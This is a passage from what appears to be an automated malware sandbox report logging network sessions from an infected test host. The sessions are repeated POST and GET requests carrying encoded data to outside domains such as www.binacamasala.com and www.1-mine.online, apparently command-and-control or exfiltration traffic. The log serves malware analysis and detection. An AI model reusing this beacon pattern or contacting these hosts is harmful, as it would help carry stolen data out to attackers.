                                                                                                                                                                                                                        Data Ascii: 2rul-=uffgsGMqdZU8s3OMtbfDJpwVc7PaV3ZQCitJAgIS806H/L5jk6t8nXID6YkArOgSxVfI/CwpD9Xfcpz8f6fEXA+cV7/mVd1e8tL2UHuZrIqu/2HNTe7NpA74Mf9O7o1R4Dmmr0xuNSkEh5ryqh1Th/PkL9wObcNUyI5Hvo93BlrQzpkOAr2soSuRgsmOAOxxGWS10hCg7Cea7XgXpJTaxasi9P3K40wsn3Undw2NVfc8sfkKgfIlPhtIyI7QzyvKVGa9oKA6tAR/NtpTZhE1+DAY89SSOm9N0JxY5p/U+F4NAPscjkOSITTWKfdE8xCibRjC/Z1GdXeJLHqftlMGlOnPj4PGvRGzHhiH2ddhNeDPS0+1VJy3+8ZIIViYjDqKfkwR8M8/NsS5agMkLsQyg9DNYjQ5WWrtKRKFnpOxNUeHBvubNqt3VlhhQ7TlHvuTdR8GMB1fotzt4ReM8zhuPoNDi+vkwV8tL2bNH7R8TZVEjj+JNSzhMU/i84TIUzSkDOSrijdJC05DLmCpPIPRzx6RLkF+xJtx8sYorf4MFrrnXKGIMGGSgOj9KbMZTvyEh5AY/rjwTqirwdDi/HmboaCgcYl3iPY4vr5GRiZ6aqW44RDaz25BwcQP810svrXIfIZ44xweqIWEm5OTt78kG7l1d1WGTOoQsnDK8hl+bISyzfNc+rgEGEufxhXFk/NY12QxsTzj9qFbeKrlAoRrFT4fcO/4/W6Z/VTUrzS52GrYd7j/dlx99oVpYBIWqt4z7c6PWJjb7qlW/xaRl0kx6pOwOjTD/K4tkuJSmjUuptpHWUriyBMin5K8IQInh15XQUu7JEP3Bi6mIWVtn9YvKUAsdvS0Yo0ERdweoJPFapzpJlhF3dmNb/rMd9UBn3R84M9ppHDq1lFxJATvWv2YP9fzGBr0gEkpQWLF6HUV9/iUtMxiKKngzMpcqb1tp3ifpIIPGwuVl4bQiqxS2AgBkkaEqCUutf04ceoW32ZVR7u39s [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.531953096 CEST2821OUTData Raw: 79 63 62 6b 48 47 63 61 4a 57 62 50 4b 6f 76 71 48 6a 74 70 56 6b 6e 30 35 32 51 7a 70 34 45 4f 36 4c 68 74 63 6e 48 79 4b 2b 53 42 30 68 77 64 36 39 78 50 76 79 35 76 32 78 71 50 30 53 30 6c 79 45 55 42 4a 63 7a 59 78 78 4c 39 51 73 62 49 4c 39
                                                                                                                                                                                                                        Data Ascii: ycbkHGcaJWbPKovqHjtpVkn052Qzp4EO6LhtcnHyK+SB0hwd69xPvy5v2xqP0S0lyEUBJczYxxL9QsbIL9Wbtq3/JpQkY0H8M5nlKGX2vDp9//2TsXzV3WWIL1XHohBSgc+CMpfGhsTTxIHQJzcwHkvwmQmTxYUrYkIg4dW82wY127fYelPaNDR7fZLN5+O6Uq/WmvEsQ4Xi+OVD4te5Z/a1qVpWMgyDs8p5UL+JDp49ymAdrEt
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875664949 CEST1289INHTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:47 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 7195
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LyCZFQbd6IN5e27jKo%2F%2FjiIOK1lpND3mkOfYouV08WYfXTGLe1wve2U6VK9knWCG6smb1XI95guQv%2FG5yw76icdhyaRF4m070V1F2jh7DemN3wrulUxbg0d48EgCb17bZed8KA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d73461f6e21428e-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94819&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7977&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 31 2d 6d [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.1-mine.online | 520: Web server
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875766993 CEST1289INData Raw: 20 69 73 20 72 65 74 75 72 6e 69 6e 67 20 61 6e 20 75 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22
                                                                                                                                                                                                                        Data Ascii: is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><m
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875781059 CEST1289INData Raw: 6c 65 61 72 66 69 78 20 6d 64 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 64 69 76 20 69 64 3d 22 63 66 2d 62 72 6f 77 73 65 72 2d 73 74 61 74 75 73 22 20 63 6c 61 73 73 3d 22 20 72 65 6c 61 74 69 76 65 20
                                                                                                                                                                                                                        Data Ascii: learfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875791073 CEST1289INData Raw: 75 74 65 20 6c 65 66 74 2d 31 2f 32 20 6d 64 3a 6c 65 66 74 2d 61 75 74 6f 20 6d 64 3a 72 69 67 68 74 2d 30 20 6d 64 3a 74 6f 70 2d 30 20 2d 6d 6c 2d 36 20 2d 62 6f 74 74 6f 6d 2d 34 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 61 3e 0a 20 20
                                                                                                                                                                                                                        Data Ascii: ute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a hr
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875801086 CEST1289INData Raw: 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 20 6d 62 2d 38 20 6c 67 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69
                                                                                                                                                                                                                        Data Ascii: </div> <div class="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="text-3xl font-n
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875902891 CEST1289INData Raw: 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 32 30 30 31 37 31 39 33 36 2d 45 72 72 6f 72 2d 35 32 30 22 3e 41 64
                                                                                                                                                                                                                        Data Ascii: er" href="https://support.cloudflare.com/hc/en-us/articles/200171936-Error-520">Additional troubleshooting resources</a>.</p> </div> </div> </div> <div class="cf-error-footer cf-wrapper w-240 lg:w-f
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875914097 CEST384INData Raw: 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76
                                                                                                                                                                                                                        Data Ascii: ),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;documen


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        85192.168.11.2049877172.67.148.13380
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:50.153589010 CEST535OUTGET /u1q9/?Hh=g6BlO&2rul-=jd3Av2k5V8Eau16mgcfaPd8VebuAL1FcJ0MaInc68HOQ7ZBrvq4ejSFdl4VVlO0+8Eq38X9/B8LMXqH/bNKlbEK/GZjnRsE0t8/pdXuVmtOQpH7wXf7Q+zg= HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:58:50.495031118 CEST942INHTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:50 GMT
                                                                                                                                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 15
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMm5q3dJhT2U3oaW6VvN7acuw9SMF%2F0Cb3Wf28brySrsMaYjhe%2BjGGq%2B8kgMpU%2BbGubVIY0ShrKF%2BUqiMFcmTf%2BhaUlUplfiH5j7AjtnRKPA0V4iL2aqs7nSInkoWh6BQN4Y7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d73462fc8de7c81-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95552&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 30
                                                                                                                                                                                                                        Data Ascii: error code: 520


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        86192.168.11.20498783.33.130.19080
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:55.612921953 CEST817OUTPOST /e0v8/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.binacamasala.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.binacamasala.com/e0v8/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 4d 54 6a 71 77 65 45 44 4d 50 56 33 77 68 57 52 4d 4b 66 7a 48 6e 61 2f 63 42 7a 63 53 69 73 34 6e 2f 44 4b 6c 31 48 33 44 6d 58 6b 30 7a 72 61 71 6f 76 4c 6f 6d 4f 70 6a 4b 75 59 7a 78 4a 45 6a 7a 59 42 41 63 54 41 64 30 50 67 49 58 39 66 63 78 75 32 31 4c 4f 6f 78 35 4f 54 47 4f 6a 54 30 39 4e 54 4b 34 58 4e 67 71 39 71 68 67 6e 6f 6e 75 52 6e 6a 77 61 52 6f 49 4d 74 4a 39 53 79 2f 61 39 4b 2b 50 31 79 69 73 79 75 65 2b 4e 55 65 7a 66 70 32 49 79 45 46 79 70 4b 77 4e 32 66 65 64 59 70 5a 47 38 68 37 6b 7a 66 5a 46 30 6b 57 72 68 5a 6b 44 43 59 57 7a 67 34 6a 52 4c 67 33 41 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=MTjqweEDMPV3whWRMKfzHna/cBzcSis4n/DKl1H3DmXk0zraqovLomOpjKuYzxJEjzYBAcTAd0PgIX9fcxu21LOox5OTGOjT09NTK4XNgq9qhgnonuRnjwaRoIMtJ9Sy/a9K+P1yisyue+NUezfp2IyEFypKwN2fedYpZG8h7kzfZF0kWrhZkDCYWzg4jRLg3A==


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        87192.168.11.20498793.33.130.19080
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:58.253422976 CEST837OUTPOST /e0v8/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.binacamasala.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.binacamasala.com/e0v8/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 4d 54 6a 71 77 65 45 44 4d 50 56 33 32 42 6d 52 4e 72 66 7a 50 6e 61 38 51 68 7a 63 45 53 73 43 6e 2f 48 4b 6c 30 43 73 43 51 6e 6b 30 54 62 61 72 71 58 4c 74 6d 4f 70 36 36 75 64 75 42 4a 66 6a 7a 55 7a 41 63 76 41 64 30 62 67 49 53 5a 66 63 67 75 70 36 37 4f 71 71 70 4f 56 4a 75 6a 54 30 39 4e 54 4b 37 72 72 67 71 46 71 67 51 33 6f 6e 4c 6c 6d 2f 67 61 53 2b 59 4d 74 66 39 53 32 2f 61 39 34 2b 4f 5a 49 69 75 36 75 65 2f 39 55 66 6e 4c 75 76 34 79 43 64 53 6f 5a 6a 4e 43 61 56 75 30 6f 65 55 77 34 39 55 2f 52 52 7a 35 2b 4c 5a 56 39 6e 51 65 71 53 44 5a 51 68 54 4b 37 71 48 57 78 48 6e 35 59 43 50 73 39 54 38 4a 73 35 44 78 32 53 64 30 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=MTjqweEDMPV32BmRNrfzPna8QhzcESsCn/HKl0CsCQnk0TbarqXLtmOp66uduBJfjzUzAcvAd0bgISZfcgup67OqqpOVJujT09NTK7rrgqFqgQ3onLlm/gaS+YMtf9S2/a94+OZIiu6ue/9UfnLuv4yCdSoZjNCaVu0oeUw49U/RRz5+LZV9nQeqSDZQhTK7qHWxHn5YCPs9T8Js5Dx2Sd0=


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        88192.168.11.20498803.33.130.19080
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.894787073 CEST2578OUTPOST /e0v8/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.binacamasala.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.binacamasala.com/e0v8/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 4d 54 6a 71 77 65 45 44 4d 50 56 33 32 42 6d 52 4e 72 66 7a 50 6e 61 38 51 68 7a 63 45 53 73 43 6e 2f 48 4b 6c 30 43 73 43 54 48 6b 30 68 54 61 71 4c 58 4c 71 6d 4f 70 6c 4b 75 63 75 42 49 64 6a 33 77 33 41 63 6a 51 64 33 6a 67 4a 78 68 66 4e 6c 4f 70 74 72 4f 71 31 35 4f 55 47 4f 6a 38 30 39 63 59 4b 34 54 72 67 71 46 71 67 57 7a 6f 67 65 52 6d 73 51 61 52 6f 49 4e 73 4a 39 54 70 2f 63 56 6f 2b 4f 64 69 69 2b 61 75 51 2f 74 55 5a 52 33 75 6d 34 79 41 49 53 70 65 6a 4e 66 4b 56 75 6f 7a 65 56 45 47 39 56 6e 52 54 30 51 42 65 72 39 53 2f 7a 36 79 66 6e 56 35 32 77 36 61 72 47 75 55 41 32 56 56 4a 37 4a 71 54 76 70 67 6f 41 5a 47 45 4a 44 2b 77 57 59 32 7a 38 71 66 5a 2b 4a 6a 6c 38 66 53 4b 45 65 55 68 6f 5a 57 52 75 77 79 79 2b 6b 32 6e 79 62 4a 56 61 6b 4c 41 79 71 2f 72 65 2f 4f 66 4d 71 35 79 54 59 61 46 71 78 57 4f 35 45 44 77 69 4e 78 49 39 6f 46 42 69 38 35 7a 37 34 39 55 64 64 77 4d 57 49 66 4a 65 30 4a 77 73 55 52 44 68 67 71 79 36 6e 64 74 55 4d 53 6e 78 2b 55 30 39 6f 58 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=MTjqweEDMPV32BmRNrfzPna8QhzcESsCn/HKl0CsCTHk0hTaqLXLqmOplKucuBIdj3w3AcjQd3jgJxhfNlOptrOq15OUGOj809cYK4TrgqFqgWzogeRmsQaRoINsJ9Tp/cVo+Odii+auQ/tUZR3um4yAISpejNfKVuozeVEG9VnRT0QBer9S/z6yfnV52w6arGuUA2VVJ7JqTvpgoAZGEJD+wWY2z8qfZ+Jjl8fSKEeUhoZWRuwyy+k2nybJVakLAyq/re/OfMq5yTYaFqxWO5EDwiNxI9oFBi85z749UddwMWIfJe0JwsURDhgqy6ndtUMSnx+U09oXed4oYo33eZ/vfTBioSg/zGQ+BgbQhILa4p0ctxKoM6cFkjLmNySjqAHiw/knpjKgLaeS34HgPDLw+EljOLXUU5pwL5dpyRBf4yeQd7pUaRQRd0S0+8jtUwHj4FemT6lUHVSlPRd8cWT2w2L0GBt78kWng60lbE74eHO8FlamDIvaKf1EOflKeZQ4rQIeFeDtU9y+PUXWUyVzXH+dNfWEtu3WR/3Hnp2yGYaGqVzfe8DcwNU7Xg80ke8bdarTyBH1ggSZpQVwLdKXu+yp2vqj3h7xnsPMP0HmYvOb+0Dxe1EavqXO/Chra7VSt4GS2svSr48d3n+la1skkFL7APb5ijWL7w/5/AdaZLnpuUbMRK8kRiZPp87pE75cC5f06FezztPWiNJsFkrHU4WvK36Qo9FDQOowF1vtYSORZ2OCmasgL1TPpIiSPgh1oEFK8pmysFZeEiw4Ylq7lyU4STowbn0BQXwcxTKet9i78hhj0IbBID0Gpc4QCt0d/rS23DpXNlTnC+K243pFhDqzK5T5uSxrPZ5aS3EeL5ANykGQPN8mTb9UxvZ0MQgTsD/QX3BdvjBS5YyH6SdCQ0sc6j340F3XXjnNuf5vNynEmjE7xmOdMpTI50p8gHHdf2bv0XWbmE4ORsNQaYzq7ZtjJlpZPShuIBKHr1rwYq [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.894844055 CEST5408OUTData Raw: 78 4f 31 4a 4d 68 72 5a 2b 4c 46 70 70 69 77 6b 61 58 4f 55 57 55 5a 6e 47 44 59 33 31 6e 58 72 5a 39 37 34 75 62 66 4b 67 2f 6a 33 73 51 43 33 2f 46 48 2b 61 45 2f 65 4c 54 51 36 6d 78 4a 6c 48 57 36 52 69 41 55 36 4a 68 46 54 62 50 38 4f 4e 49
                                                                                                                                                                                                                        Data Ascii: xO1JMhrZ+LFppiwkaXOUWUZnGDY31nXrZ974ubfKg/j3sQC3/FH+aE/eLTQ6mxJlHW6RiAU6JhFTbP8ONIq2G95ciH/nj+atDQ+O5UIKOJiVTLgSliosqIYBqxUYy3xDZvpWVxHxheA+f5FFxYH0ZD9Y0+dowZDN5DQJGIBHXvnUR3BHRlE0hHVm8XjeIgMWr/6vN9bMTY1cISqlJBZA5PLsu/nI8itM22q+s3xpGbAkjkaeSEy


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        89192.168.11.20498813.33.130.19080
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:59:03.530150890 CEST538OUTGET /e0v8/?2rul-=BRLKzowcHpFkwiCaHOnpSWjmXz6pRQQbl5LLjDqiFhfX4i3Xo6uolyXZn4m1rAB7uwEzOtHNU3mZLRFYJya+3dmXpK/KMeaogPo3NqnUjbhI+XHqg4485wo=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:59:06.545911074 CEST390INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:59:06 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 72 75 6c 2d 3d 42 52 4c 4b 7a 6f 77 63 48 70 46 6b 77 69 43 61 48 4f 6e 70 53 57 6a 6d 58 7a 36 70 52 51 51 62 6c 35 4c 4c 6a 44 71 69 46 68 66 58 34 69 33 58 6f 36 75 6f 6c 79 58 5a 6e 34 6d 31 72 41 42 37 75 77 45 7a 4f 74 48 4e 55 33 6d 5a 4c 52 46 59 4a 79 61 2b 33 64 6d 58 70 4b 2f 4b 4d 65 61 6f 67 50 6f 33 4e 71 6e 55 6a 62 68 49 2b 58 48 71 67 34 34 38 35 77 6f 3d 26 48 68 3d 67 36 42 6c 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=BRLKzowcHpFkwiCaHOnpSWjmXz6pRQQbl5LLjDqiFhfX4i3Xo6uolyXZn4m1rAB7uwEzOtHNU3mZLRFYJya+3dmXpK/KMeaogPo3NqnUjbhI+XHqg4485wo=&Hh=g6BlO"}</script></head></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        90192.168.11.20498823.33.130.19080
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:59:11.678843975 CEST802OUTPOST /n7zc/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.wrl-llc.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.wrl-llc.net/n7zc/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
